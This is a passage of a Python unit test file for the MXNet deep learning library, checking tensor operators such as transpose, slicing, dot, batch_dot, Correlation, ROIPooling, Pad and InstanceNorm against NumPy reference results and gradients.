assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
@pytest.mark.serial
def test_big_transpose():
n = [1]
d = list(np.random.randint(132, 160, size=1))
hw = list(np.random.randint(256, 320, size=2))
c = [10]
dims = n + d + hw + c
axes = (0,4,1,2,3)
x_np = np.random.normal(size=dims).astype('uint8')
x = mx.nd.array(x_np, dtype='uint8')
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x_np, axes=axes), y.asnumpy().astype('uint8'))
axes = (0,2,3,4,1)
z = mx.nd.transpose(y, axes=axes)
assert_allclose(x_np, z.asnumpy().astype('uint8'))
@pytest.mark.serial
def test_larger_transpose():
x = mx.nd.random.normal(shape=(50,51))
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
def test_expand_dims():
for ndim in range(1, 6):
for axis in range(-ndim + 1, ndim):
x = np.random.normal(size=list(np.random.randint(1, 10, size=ndim)))
y = mx.nd.array(x)
x1 = np.expand_dims(x, axis=axis)
y1 = mx.nd.expand_dims(y, axis=axis)
assert_allclose(x1, y1.asnumpy())
assert_allclose(x1.shape, y1.shape)
def test_crop():
for ndim in range(1, 6):
for _ in range(5):
dims = []
begin = []
end = []
idx = []
for _ in range(ndim):
d = random.randint(1, 5)
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if b == 0 and random.randint(0, 1):
b = None
elif b != 0 and random.randint(0, 1):
b -= d
if e == d and random.randint(0, 1):
e = None
elif e != d and random.randint(0, 1):
e -= d
dims.append(d)
begin.append(b)
end.append(e)
idx.append(slice(b, e))
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.crop(x, begin=tuple(begin), end=tuple(end))
assert_allclose(x.asnumpy()[idx], y.asnumpy())
vx = mx.sym.Variable('x')
vy = mx.sym.crop(vx, begin=tuple(begin), end=tuple(end))
check_numeric_gradient(vy, [x.asnumpy()])
def test_slice_axis():
for ndim in range(1, 6):
shape = np.random.randint(1, 11, size=(ndim,))
for t in range(ndim):
d = shape[t]
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if np.random.rand() > 0.6:
e = None
else:
if e < d and np.random.rand() > 0.5:
e = e - d
if np.random.rand() > 0.5:
b = b - d
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
idx[t] = slice(b, e)
X = mx.symbol.Variable('X')
x = mx.nd.array(np.random.normal(size=shape))
Y = mx.symbol.slice_axis(data=X, axis=t, begin=b, end=e)
xgrad = mx.nd.empty(x.shape)
exec1 = Y._bind(default_device(), args = [x], args_grad = {'X': xgrad})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
x_grad_npy = np.random.normal(size=x.shape)
xgrad = mx.nd.array(x_grad_npy)
exec2 = Y._bind(default_device(), args=[x], args_grad={'X': xgrad}, grad_req="add")
exec2.forward(is_train=True)
exec2.backward([exec2.outputs[0]])
xx = np.zeros(shape=x.shape, dtype=np.float32)
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx + x_grad_npy, xgrad.asnumpy(), atol=1E-5)
def test_slice_like():
for ndim in range(1, 6):
from_shape = np.random.randint(1, 11, size=(ndim,))
shape = [s + np.random.randint(0, 3) for s in from_shape]
for t in range(ndim):
if t > 0:
axes = np.random.randint(0, ndim, size=t).tolist()
else:
axes = []
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
if i in axes or not axes:
idx[i] = slice(0, from_shape[i])
if axes:
pos = np.random.randint(0, t)
if axes[pos] > 0:
axes[pos] -= ndim # negative index
X = mx.symbol.Variable('X')
X_1 = mx.symbol.Variable('X1')
x = mx.nd.array(np.random.normal(size=shape))
x1 = mx.nd.array(np.random.normal(size=from_shape))
Y = mx.symbol.slice_like(data=X, shape_like=X_1, axes=axes)
xgrad = mx.nd.empty(x.shape)
xgrad1 = mx.nd.empty(x1.shape)
exec1 = Y._bind(default_device(), args = [x, x1],
args_grad = {'X': xgrad, 'X1': xgrad1})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
assert_allclose(xgrad1.asnumpy(), mx.nd.zeros_like(xgrad1).asnumpy())
def test_slice_like_different_types():
x = [[ 1., 2., 3., 4.],
[ 5., 6., 7., 8.],
[ 9., 10., 11., 12.]]
y = [[ 0., 0., 0.],
[ 0., 0., 0.]]
x = mx.nd.array(x)
y = mx.nd.array(y).astype('int32')
z = mx.nd.slice_like(x, y)
assert_allclose(z.asnumpy(), [[1,2,3],[5,6,7]])
def test_reshape_like_different_types():
x = mx.nd.zeros((2, 3))
y = mx.nd.array([[1, 2], [3, 4], [5, 6]])
y = mx.nd.array(y).astype('int32')
z = mx.nd.reshape_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0],[0,0]])
def test_broadcast_like_different_types():
x = mx.nd.zeros((2, 1))
y = mx.nd.ones((2, 2))
y = mx.nd.array(y).astype('int32')
z = mx.nd.broadcast_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0]])
assert x.dtype == z.dtype
def test_flip():
for ndim in range(1, 6):
for _ in range(5):
dims = [random.randint(1,10) for i in range(ndim)]
axis = random.randint(0, ndim-1)
idx = [slice(None, None, -1) if i == axis else slice(None, None) for i in range(ndim)]
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.flip(x, axis=axis)
assert_allclose(x.asnumpy()[idx], y.asnumpy())
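# SpatialTransformer check: with zero localization weights and bias [0.5, 0, 0, 0, 0.5, 0],
# the predicted affine samples the central half of the input, so the output (and the
# propagated gradient) must equal the corresponding center crop of the data.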
def test_stn():
import sys
np.set_printoptions(threshold=sys.maxsize)
num_filter = 2 # conv of loc net
kernel = (3, 3) # conv of loc net
num_hidden = 6 # fc of loc net
for n in [1, 2, 3, 4]:
for c in [1, 2, 3, 4]:
            for h in [5, 9, 13, 17]:  # for convenience, the third and fourth input dims should be 4x + 1
for w in [5, 9, 13, 17]:
data_shape = (n, c, h, w)
target_shape = (int((data_shape[2]+1)/2), int((data_shape[3]+1)/2))
data = mx.sym.Variable(name="data")
loc = mx.sym.Convolution(data=data, kernel=kernel, pad=(1, 1), num_filter=num_filter, name="loc_conv")
loc = mx.sym.Flatten(data=loc)
loc = mx.sym.FullyConnected(data=loc, num_hidden=num_hidden, name="loc_fc")
stn = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=target_shape,
transform_type="affine", sampler_type="bilinear")
arg_names = stn.list_arguments()
arg_shapes, out_shapes, _ = stn.infer_shape(data=data_shape)
# check shape
assert out_shapes[0] == (data_shape[0], data_shape[1], target_shape[0], target_shape[1])
dev = default_device()
#dev = mx.gpu(0)
args = {}
args['data'] = mx.random.normal(0, 1, data_shape, ctx=mx.cpu()).copyto(dev)
args['loc_conv_weight'] = mx.nd.zeros((num_filter, data_shape[1], kernel[0], kernel[1]), ctx=dev)
args['loc_conv_bias'] = mx.nd.zeros((num_filter,), ctx=dev)
args['loc_fc_weight'] = mx.nd.zeros((6, num_filter*data_shape[2]*data_shape[3]), ctx=dev)
args['loc_fc_bias'] = mx.nd.array([0.5, 0, 0, 0, 0.5, 0], ctx=dev)
grad_grad = [mx.nd.zeros(shape, ctx=dev) for shape in arg_shapes]
exe = stn._bind(dev, args=args, args_grad=grad_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
# check forward
assert_almost_equal(out, args['data'].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
out_grad = mx.nd.ones(out.shape, ctx=dev)
exe.backward([out_grad])
# check backward
assert_almost_equal(out_grad, grad_grad[0].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
def test_stn_valid_sampling():
target_shape = (
28,
28,
)
src_shape = (
42,
42,
)
data = mx.sym.Variable(name="data")
loc = mx.sym.Variable(name="loc")
data_array = np.zeros((
1,
1,
) + src_shape)
# Have an ever so slight rotation.
loc_array = np.array(
[[9.03887e-05, 1.00015, 0.00174931, 1.0003, 0.000311901,
-0.000919065]])
stn = mx.sym.SpatialTransformer(
data=data,
loc=loc,
target_shape=target_shape,
transform_type="affine",
sampler_type="bilinear")
grad_req = {k: 'write' for k in stn.list_arguments()}
grads = {
'data': mx.nd.array(np.zeros_like(data_array)),
'loc': mx.nd.array(np.zeros_like(loc_array))
}
executor = stn._bind(
ctx=default_device(),
args={'data': mx.nd.array(data_array),
'loc': mx.nd.array(loc_array)},
grad_req=grad_req,
args_grad=grads)
executor.forward(is_train=True)
executor.backward(mx.nd.ones((
1,
1,
) + target_shape))
def test_dot():
ctx = default_device()
dtypes = ['float32', 'float64']
ndims = [2]
if ctx.device_type == 'gpu':
dtypes += ['float16']
ndims += [1]
# Test normal dot.
for ndim in ndims:
for data_type in dtypes:
tol = 1e-2 if data_type == 'float16' else 1e-3
for m in range(1, 5):
for k in range(1, 5):
                    if ndim == 1 and k != 1:
                        continue
for n in range(1, 5):
a_shape = (m, k) if ndim == 2 else (m,)
b_shape = (k, n) if ndim == 2 else (n,)
a_npy = np.random.normal(0, 1, (m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((m, k), dtype=data_type)
bgrad_npy = np.empty((k, n), dtype=data_type)
c_npy[:, :] = np.dot(a_npy[:, :], b_npy[:, :])
bgrad_npy[:, :] = np.dot(a_npy[:, :].T, ograd_npy[:, :])
agrad_npy[:, :] = np.dot(ograd_npy[:, :], b_npy[:, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.dot(a, b)
exe = c._simple_bind(ctx=ctx, a=a_npy.shape, b=b_npy.shape)
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy, rtol=tol, atol=tol)
exe.backward(out_grads=[mx.nd.array(ograd_npy, mx.cpu()).astype(data_type)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy, rtol=tol, atol=tol)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy, rtol=tol, atol=tol)
# Test dot with transpose flag using gradient checker.
def dot_sym(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y)
def dot_sym_xT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True)
def dot_sym_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_b=True)
def dot_sym_xT_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True, transpose_b=True)
for data_type in dtypes:
for ashape, bshape in [((3, 4), (4, 5)), ((2, 3, 4), (4, 5, 6))]:
m1_npy = np.random.uniform(-1, 1, ashape)
m1_npy = m1_npy.astype(data_type)
m2_npy = np.random.uniform(-1, 1, bshape)
m2_npy = m2_npy.astype(data_type)
check_numeric_gradient(dot_sym(data_type), [m1_npy, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT(data_type), [m1_npy.T, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_yT(data_type), [m1_npy, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT_yT(data_type), [m1_npy.T, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
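# batch_dot is checked per sample against np.dot, covering the transpose_a/transpose_b
# flags and gradient accumulation with grad_req='add'.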
def test_batch_dot():
ctx = default_device()
dtypes = ['float32', 'float64']
if ctx.device_type == 'gpu':
dtypes += ['float16']
for data_type in dtypes:
for batch_size in range(1, 5):
for m in range(1, 5):
for k in range(1, 5):
for n in range(1, 5):
transpose_a = (np.random.rand() > 0.5)
transpose_b = (np.random.rand() > 0.5)
a_npy = np.random.normal(0, 1, (batch_size, m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (batch_size, k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((batch_size, m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (batch_size, m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((batch_size, m, k), dtype=data_type)
bgrad_npy = np.empty((batch_size, k, n), dtype=data_type)
a_init_grad_npy = np.random.normal(size=(batch_size, m, k))
a_init_grad_npy = a_init_grad_npy.astype(data_type)
b_init_grad_npy = np.random.normal(size=(batch_size, k, n))
b_init_grad_npy = b_init_grad_npy.astype(data_type)
for i in range(batch_size):
c_npy[i, :, :] = np.dot(a_npy[i, :, :], b_npy[i, :, :])
bgrad_npy[i, :, :] = np.dot(a_npy[i, :, :].T, ograd_npy[i, :, :])
agrad_npy[i, :, :] = np.dot(ograd_npy[i, :, :], b_npy[i, :, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.batch_dot(a, b, transpose_a=transpose_a, transpose_b=transpose_b)
if transpose_a:
a_npy = np.transpose(a_npy, axes=(0, 2, 1))
agrad_npy = np.transpose(agrad_npy, axes=(0, 2, 1))
a_init_grad_npy = np.transpose(a_init_grad_npy, axes=(0, 2, 1))
if transpose_b:
b_npy = np.transpose(b_npy, axes=(0, 2, 1))
bgrad_npy = np.transpose(bgrad_npy, axes=(0, 2, 1))
b_init_grad_npy = np.transpose(b_init_grad_npy, axes=(0, 2, 1))
exe = c._simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='write')
exe_add = c._simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='add')
exe_add.grad_dict['a'][:] = a_init_grad_npy
exe_add.grad_dict['b'][:] = b_init_grad_npy
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe.backward(out_grads=[mx.nd.array(ograd_npy, dtype=outputs[0].dtype, ctx=exe._device)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe_add.forward(is_train=True, a=a_npy, b=b_npy)
exe_add.backward(out_grads=[mx.nd.array(ograd_npy, dtype=exe_add.outputs[0].dtype, ctx=exe._device)])
assert_almost_equal(exe_add.grad_dict['a'],
agrad_npy + a_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe_add.grad_dict['b'],
bgrad_npy + b_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
def get_correlation(data1,data2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply):
img1 = mx.sym.Variable('img1')
img2 = mx.sym.Variable('img2')
    return mx.sym.Correlation(data1=img1, data2=img2, kernel_size=kernel_size, max_displacement=max_displacement,
                              stride1=stride1, stride2=stride2, pad_size=pad_size, is_multiply=is_multiply)
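# NumPy reference for the Correlation forward pass: for every output location, a
# kernel_size x kernel_size patch of (padded) data1 is compared with displaced patches
# of data2 (a dot product when is_multiply is set, otherwise a sum of absolute
# differences), normalized by the patch size times the number of channels.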
def correlation_forward(data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp2 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp1[:, :, pad_size:pad_size + data1.shape[2], pad_size:pad_size + data1.shape[3]] = data1[:,:,:,:]
tmp2[:, :, pad_size:pad_size + data2.shape[2], pad_size:pad_size + data2.shape[3]] = data2[:,:,:,:]
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
out[nbatch, top_channel, i, j] += tmp1[nbatch, channel,y1 + h, x1 + w] * tmp2[nbatch, channel, y2 + h,x2 + w]
else:
out[nbatch, top_channel, i, j] += abs(tmp1[nbatch, channel, y1 + h, x1 + w] - tmp2[nbatch, channel, y2 + h, x2 + w])
out /= float(kernel_size**2*data1.shape[1])
return out,tmp1,tmp2
def correlation_backward(out_grad,tmp1,tmp2,data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1_grad = np.zeros(tmp1.shape)
tmp2_grad = np.zeros(tmp2.shape)
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*tmp2[nbatch, channel, y2 + h,x2 + w]
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*tmp1[nbatch, channel, y1 + h,x1 + w]
else:
sgn = 1 if (tmp1[nbatch, channel, y1 + h,x1 + w]>=tmp2[nbatch, channel, y2 + h,x2 + w]) else -1
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*sgn
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*(-sgn)
tmp1_grad = tmp1_grad / float(kernel_size**2*data1.shape[1])
tmp2_grad = tmp2_grad / float(kernel_size**2*data1.shape[1])
return tmp1_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],tmp2_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],
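# The backward pass above is the adjoint of correlation_forward: every product (or absolute
# difference) term that contributed to out[n, c, i, j] sends out_grad[n, c, i, j] back to the
# same tmp1/tmp2 locations it read, scaled by the other operand in the multiply case and by
# +/-1 (the sign of the difference) in the absolute-difference case, before the 1/(K^2 * C)
# normalization is applied and the padding is cropped off again.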
def unittest_correlation(data_shape,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply,dtype):
img1 = np.random.random(data_shape)
img1 = img1.astype(dtype)
img2 = np.random.random(data_shape)
img2 = img2.astype(dtype)
net1 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply)
net2 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply )
exe1 = net1._simple_bind(default_device(),img1=img1.shape,img2=img1.shape)
exe1.arg_dict['img1'][:] = img1
exe1.arg_dict['img2'][:] = img2
#cpu forward
exe1.forward(is_train=True)
# python forward
forward_result,tmp1,tmp2 = correlation_forward(img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# forward error
assert_almost_equal(exe1.outputs[0], forward_result, rtol=1e-4, atol=1e-4)
# out_grad
a = np.ones(forward_result.shape)
out_grad1 = mx.nd.array(a,default_device())
# cpu backward
exe1.backward(out_grads=out_grad1)
# python backward
grad1,grad2 = correlation_backward(a,tmp1,tmp2,img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# backward error
assert_almost_equal(exe1.grad_dict['img1'], grad1, rtol=1e-3, atol=1e-4)
assert_almost_equal(exe1.grad_dict['img2'], grad2, rtol=1e-3, atol=1e-4)
def test_correlation():
def test_infer_type(dtype):
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
corr = mx.sym.Correlation(data1=a, data2=b)
arg_type1, out_type1, _ = corr.infer_type(a=dtype)
        if arg_type1[0] != np.dtype(dtype) or arg_type1[1] != np.dtype(dtype) or out_type1[0] != np.dtype(dtype):
            msg = npt.build_err_msg([a, b],
                                    err_msg="Inferred type from a is not as expected, "
                                            "Expected :%s %s %s, Got: %s %s %s"
                                            % (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
                                    names=['a', 'b'])
            raise AssertionError(msg)
arg_type2, out_type2, _ = corr.infer_type(b=dtype)
        if arg_type2[0] != np.dtype(dtype) or arg_type2[1] != np.dtype(dtype) or out_type2[0] != np.dtype(dtype):
            msg = npt.build_err_msg([a, b],
                                    err_msg="Inferred type from b is not as expected, "
                                            "Expected :%s %s %s, Got: %s %s %s"
                                            % (dtype, dtype, dtype, arg_type2[0], arg_type2[1], out_type2[0]),
                                    names=['a', 'b'])
            raise AssertionError(msg)
for dtype in ['float16', 'float32']:
test_infer_type(dtype)
        unittest_correlation((1, 3, 10, 10), kernel_size=1, max_displacement=4, stride1=1, stride2=1, pad_size=4, is_multiply=False, dtype=dtype)
        unittest_correlation((5, 1, 15, 15), kernel_size=1, max_displacement=5, stride1=1, stride2=1, pad_size=5, is_multiply=False, dtype=dtype)
        unittest_correlation((5, 1, 15, 15), kernel_size=1, max_displacement=5, stride1=1, stride2=1, pad_size=5, is_multiply=True, dtype=dtype)
        unittest_correlation((5, 1, 15, 15), kernel_size=1, max_displacement=10, stride1=1, stride2=2, pad_size=10, is_multiply=True, dtype=dtype)
        unittest_correlation((5, 1, 4, 4), kernel_size=3, max_displacement=1, stride1=1, stride2=1, pad_size=2, is_multiply=True, dtype=dtype)
        unittest_correlation((5, 1, 4, 4), kernel_size=3, max_displacement=1, stride1=2, stride2=1, pad_size=2, is_multiply=True, dtype=dtype)
        unittest_correlation((5, 1, 4, 4), kernel_size=3, max_displacement=1, stride1=2, stride2=1, pad_size=2, is_multiply=False, dtype=dtype)
        unittest_correlation((5, 1, 6, 4), kernel_size=3, max_displacement=1, stride1=2, stride2=1, pad_size=2, is_multiply=False, dtype=dtype)
        unittest_correlation((5, 1, 11, 11), kernel_size=5, max_displacement=1, stride1=1, stride2=1, pad_size=2, is_multiply=False, dtype=dtype)
        with pytest.raises(MXNetError):
            unittest_correlation((1, 3, 10, 10), kernel_size=1, max_displacement=4, stride1=0, stride2=1, pad_size=4, is_multiply=False, dtype=dtype)
        with pytest.raises(MXNetError):
            unittest_correlation((5, 1, 15, 15), kernel_size=1, max_displacement=5, stride1=1, stride2=0, pad_size=5, is_multiply=False, dtype=dtype)
        with pytest.raises(MXNetError):
            unittest_correlation((5, 1, 15, 15), kernel_size=1, max_displacement=5, stride1=1, stride2=0, pad_size=5, is_multiply=True, dtype=dtype)
        with pytest.raises(MXNetError):
            unittest_correlation((1, 3, 10, 10), kernel_size=1, max_displacement=4, stride1=0, stride2=1, pad_size=4, is_multiply=True, dtype=dtype)
# Seed set because the test is not robust enough to operate on random data
@pytest.mark.seed(1234)
def test_roipooling():
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.ROIPooling(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1)
x1 = np.random.rand(4, 3, 12, 8).astype('float32')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2], [1, 3.1, 1.1, 5.2, 10.2], [0, 3, 3, 3, 3]], dtype='float32')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'write', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'add', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1E-4)
def check_pad_with_shape(shape, xpu, pad_width, mode, dtype="float64"):
# bind with label
X = mx.symbol.Variable('X', dtype=dtype)
Y = mx.symbol.Pad(data=X, mode=mode, pad_width=pad_width)
x = mx.random.uniform(-1, 1, shape, ctx=mx.cpu(), dtype=dtype).copyto(xpu)
# numpy result
pad_grouped = list(zip(*[iter(list(pad_width))] * 2))
np_out = np.pad(x.asnumpy(), pad_grouped, mode)
# mxnet result
grad = mx.nd.empty(shape, ctx = xpu, dtype=dtype)
exec1 = Y._bind(xpu, args = [x], args_grad = {'X': grad})
exec1.forward(is_train=True)
out = exec1.outputs[0]
# compare numpy + mxnet
assert_almost_equal(out, np_out)
# grad check
check_numeric_gradient(Y, [x.asnumpy()], numeric_eps=1e-2, rtol=1e-2)
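# Note on the pad_width handling above: mx.sym.Pad takes a flat tuple with two entries per
# axis, so zip(*[iter(pad_width)] * 2) regroups e.g. (0, 0, 0, 0, 1, 2, 3, 4) into
# ((0, 0), (0, 0), (1, 2), (3, 4)), which is exactly the per-axis (before, after) format that
# np.pad expects for the reference result.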
def test_pad():
ctx = default_device()
shape1 = (2, 3, 3, 5)
pad1 = (0, 0, 0, 0, 1, 2, 3, 4)
shape2 = (2, 3, 3, 5, 4)
pad2 = (0, 0, 0, 0, 1, 2, 3, 4, 3, 1)
# note: this op doesn't support ints yet. Add tests when supported
dtypes = ["float16", "float32", "float64"]
for dtype in dtypes:
check_pad_with_shape(shape1, ctx, pad1, 'constant', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'edge', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'constant', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'edge', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'reflect', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'reflect', dtype)
def np_instance_norm(data, weight, bias, eps):
spatial_dims = data.shape[2::]
num_spatial_vals = np.prod(np.array(spatial_dims))
scale = 1/float(num_spatial_vals)
sum_axis = tuple(range(2, data.ndim))
mean = scale * np.sum(data, axis = sum_axis)
mean = np.reshape(np.repeat(mean, num_spatial_vals), data.shape)
var = scale * np.sum((data - mean)**2, axis = sum_axis)
var = np.reshape(np.repeat(var, num_spatial_vals), data.shape)
weightBatch = np.tile(weight, (data.shape[0], 1))
weightBatch = np.reshape(np.repeat(weightBatch, num_spatial_vals), data.shape)
biasBatch = np.tile(bias, (data.shape[0], 1))
biasBatch = np.reshape(np.repeat(biasBatch, num_spatial_vals), data.shape)
return weightBatch * (data - mean)/np.sqrt(var + eps) + biasBatch
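# A more compact reference for the same computation (an illustrative sketch only; the helper
# name is ours and the tests below rely solely on np_instance_norm). It computes the identical
# per-sample, per-channel normalization using keepdims broadcasting instead of repeat/reshape.
def _np_instance_norm_keepdims(data, weight, bias, eps):
    axes = tuple(range(2, data.ndim))                # spatial axes only
    mean = data.mean(axis=axes, keepdims=True)       # per (batch, channel) mean
    var = data.var(axis=axes, keepdims=True)         # per (batch, channel) variance
    bshape = (1, data.shape[1]) + (1,) * (data.ndim - 2)
    gamma = np.asarray(weight).reshape(bshape)       # broadcast gamma over batch and space
    beta = np.asarray(bias).reshape(bshape)          # broadcast beta over batch and space
    return gamma * (data - mean) / np.sqrt(var + eps) + beta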
def check_instance_norm_with_shape(shape, xpu):
# bind with label
eps = 0.001
X = mx.symbol.Variable('X')
G = mx.symbol.Variable('G')
B = mx.symbol.Variable('B')
Y = mx.symbol.InstanceNorm(data=X, beta=B, gamma=G, eps=eps)
x = mx.random.normal(0, 1, shape, ctx=mx.cpu()).copyto(xpu)
gamma = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
beta = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
np_out = np_instance_norm(x.asnumpy(), gamma.asnumpy(), beta.asnumpy(), eps)
